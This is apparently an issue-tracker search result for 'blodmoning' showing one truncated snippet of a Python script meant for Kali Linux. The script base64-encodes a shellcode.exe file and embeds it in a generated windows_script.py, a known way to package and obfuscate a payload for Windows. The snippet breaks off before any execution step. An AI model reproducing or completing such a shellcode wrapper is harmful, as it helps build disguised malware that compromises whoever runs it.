blodmoning
Results
1
issues of
blodmoning
 # The code running in Kali linux windows_script.py with open('shellcode.exe', 'rb') as shellcode_file: shellcode = shellcode_file.read() import base64 encoded_shellcode = base64.b64encode(shellcode).decode('utf-8') with open('windows_script.py', 'w') as f: f.write(f'''import base64 import...